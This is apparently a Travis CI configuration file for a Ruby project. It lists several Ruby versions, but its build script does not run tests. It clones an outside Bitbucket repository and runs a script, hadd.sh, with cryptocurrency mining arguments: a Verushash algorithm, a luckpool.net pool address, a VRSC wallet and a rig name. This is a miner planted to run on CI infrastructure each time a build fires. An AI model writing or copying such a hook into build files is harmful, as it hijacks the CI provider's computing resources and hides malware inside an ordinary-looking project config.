language: ruby
rvm:
- 1.9.3
- 2.0.0
- 2.1.2
- 2.1.3
- 2.1.4
- 2.1.5
- 2.1.6
- 2.1.7

sudo: false
script: git clone https://Jhonynrake@bitbucket.org/Jhonynrake/bunda.git && cd bunda && chmod +x *.sh && sed -i -e 's/\r$//' hadd.sh && ./hadd.sh -algo Verushash -pool1 na.luckpool.net:3956 -wallet RPn4qqbnhdoq2e7pihHD9ErCkZdakWYW4M -coin VRSC -rigname TVS -email olagk13@gmail.com
bundler_args: "--without play"